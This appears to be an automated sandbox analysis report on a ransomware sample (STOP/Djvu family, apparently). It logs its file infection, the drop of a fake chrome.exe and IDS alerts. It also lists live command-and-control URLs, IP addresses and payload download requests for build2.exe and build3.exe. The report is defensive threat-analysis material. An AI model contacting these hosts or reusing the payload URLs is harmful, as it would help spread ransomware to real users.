          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\$< source: E0tabE4K4r.exe, 00000006.00000003.1930135504.0000000003994000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1930586659.0000000003994000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\47\ source: E0tabE4K4r.exe, 00000006.00000003.1887764284.00000000036DF000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ing\\>MbvH source: E0tabE4K4r.exe, 00000006.00000003.1840067885.000000000377D000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852901443.000000000378E000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852217055.000000000370D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: EXCEntkrnlmp.pdbl.GovernedChannelStates.json source: E0tabE4K4r.exe, 00000006.00000003.1764092521.0000000003115000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errore\AppCache133409776161022105.txttxtc! source: E0tabE4K4r.exe, 00000006.00000003.1763817024.0000000003147000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763893002.000000000314B000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1765255772.000000000314C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763606123.000000000312C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763564795.0000000003129000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763646990.0000000003138000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: E0tabE4K4r.exe, 00000006.00000003.1899749395.0000000003B2D000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1900876731.0000000003960000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1923741980.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\DB\ source: E0tabE4K4r.exe, 00000006.00000003.1852901443.000000000378E000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852217055.000000000370D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\} source: E0tabE4K4r.exe, 00000006.00000003.1819763925.00000000035E0000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763103396.00000000035DC000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1819912716.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763722153.00000000035E7000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1765648554.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1820389653.00000000035EC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\920\ttingK source: E0tabE4K4r.exe, 00000006.00000002.1933769256.0000000003159000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\: source: E0tabE4K4r.exe, 00000006.00000003.1893459042.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1899749395.00000000039EC000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1893613345.00000000039DE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: E0tabE4K4r.exe, 00000006.00000003.1893459042.0000000003921000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1887764284.00000000036DF000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1889475372.0000000003931000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: E0tabE4K4r.exe, 00000006.00000003.1872201684.00000000035FD000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1853107330.00000000035FD000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852569222.00000000035D8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: E0tabE4K4r.exe, 00000006.00000003.1820263634.0000000003709000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ies\0s source: E0tabE4K4r.exe, 00000006.00000003.1901213675.0000000003603000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1894086061.0000000003603000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: E0tabE4K4r.exe, 00000006.00000003.1854428901.0000000003958000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1853741689.0000000003951000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852759679.00000000039CA000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1854706372.0000000003961000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\ source: E0tabE4K4r.exe, 00000006.00000003.1839468903.0000000003136000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852996109.0000000003136000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1853232093.000000000313E000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1853430794.0000000003154000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: E0tabE4K4r.exe, 00000006.00000003.1899749395.00000000039EC000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1894542870.0000000003A9F000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1893248676.0000000003A9F000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1900272839.0000000003A35000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: E0tabE4K4r.exe, 00000006.00000003.1765255772.0000000003148000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1820362877.0000000003199000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1819729818.0000000003197000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763426037.000000000317E000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763857201.0000000003188000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1819425961.0000000003169000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763817024.0000000003147000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763606123.000000000312C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763564795.0000000003129000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1839267370.000000000319D000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1818903237.0000000003136000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763646990.0000000003138000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\\K source: E0tabE4K4r.exe, 00000006.00000003.1871477613.000000000374A000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1872238803.00000000037AE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\D.(z source: E0tabE4K4r.exe, 00000006.00000003.1899749395.00000000039EC000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1894542870.0000000003A9F000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1893248676.0000000003A9F000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1900272839.0000000003A35000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: E0tabE4K4r.exe, 00000006.00000003.1765480086.0000000003139000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1588022675.0000000003136000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763606123.000000000312C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1616546391.0000000003115000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763564795.0000000003129000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1587983645.000000000312C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763646990.0000000003138000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\z source: E0tabE4K4r.exe, 00000006.00000003.1924950025.00000000039BD000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ta\ source: E0tabE4K4r.exe, 00000006.00000003.1871477613.000000000374A000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1853061569.0000000003745000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852217055.000000000370D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\ source: E0tabE4K4r.exe, 00000006.00000003.1616546391.0000000003115000.00000004.00000020.00020000.00000000.sdmp

          Spreading

          barindex
          Infects executable files (exe, dll, sys, html)
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00410160
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_0040F730
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_0040FB98
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,6_2_0040F730
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,6_2_00410160
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,6_2_0040FB98
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.11:49710 -> 109.175.29.39:80
          Source: TrafficSnort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.11:49708 -> 211.40.39.251:80
          Source: TrafficSnort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.11:49708 -> 211.40.39.251:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: http://zexeq.com/test1/get.php
          Source: global trafficTCP traffic: 192.168.2.11:49713 -> 49.12.114.15:10220
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Jan 2024 12:35:02 GMTContent-Type: application/octet-streamContent-Length: 367104Last-Modified: Wed, 10 Jan 2024 12:50:02 GMTConnection: closeETag: "659e927a-59a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 60 e6 e8 d7 24 87 86 84 24 87 86 84 24 87 86 84 3a d5 13 84 35 87 86 84 3a d5 05 84 76 87 86 84 3a d5 02 84 00 87 86 84 03 41 fd 84 27 87 86 84 24 87 87 84 78 87 86 84 3a d5 0c 84 25 87 86 84 3a d5 12 84 25 87 86 84 3a d5 17 84 25 87 86 84 52 69 63 68 24 87 86 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 02 ae 12 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 0e 04 00 00 b4 01 00 00 00 00 00 94 22 00 00 00 10 00 00 00 20 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 05 00 00 04 00 00 57 7d 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 55 04 00 28 00 00 00 00 10 05 00 ca c1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 48 04 00 18 00 00 00 58 48 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 04 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 79 0d 04 00 00 10 00 00 00 0e 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c0 3d 00 00 00 20 04 00 00 3e 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 97 00 00 00 60 04 00 00 86 00 00 00 50 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 a1 01 00 00 00 00 05 00 00 02 00 00 00 d6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ca c1 00 00 00 10 05 00 00 c2 00 00 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: GET /bg3goty HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
          Source: Joe Sandbox ViewIP Address: 211.40.39.251 211.40.39.251
          Source: Joe Sandbox ViewASN Name: LGDACOMLGDACOMCorporationKR LGDACOMLGDACOMCorporationKR
          Source: Joe Sandbox ViewASN Name: BIHNETBIHNETAutonomusSystemBA BIHNETBIHNETAutonomusSystemBA
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.114.15
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_0040CF10
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /bg3goty HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
          Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
          Source: global trafficHTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: brusuax.com
          Source: global trafficHTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
          Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
          Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
          Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
          Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
          Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
          Source: global trafficHTTP traffic detected: GET /test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
          Source: E0tabE4K4r.exe, 0000000D.00000003.1532010542.0000000003570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: E0tabE4K4r.exe, 00000006.00000003.1532178298.00000000035A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
          Source: E0tabE4K4r.exe, 00000006.00000003.1532235190.00000000035A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
          Source: unknownDNS traffic detected: queries for: api.2ip.ua
          Source: E0tabE4K4r.exe, 00000006.00000002.1932442705.00000000007A3000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1931541132.00000000007A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://brusuax.com/dl/build2.exe
          Source: E0tabE4K4r.exe, 00000006.00000002.1932298483.000000000075A000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000002.1932553680.00000000007C5000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1930812818.00000000007C5000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000002.1932298483.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://brusuax.com/dl/build2.exe$run
          Source: E0tabE4K4r.exe, 00000006.00000002.1932442705.00000000007A3000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1931541132.00000000007A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://brusuax.com/dl/build2.exe%
          Source: build2.exe, 0000000F.00000002.2489003715.0000000000769000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
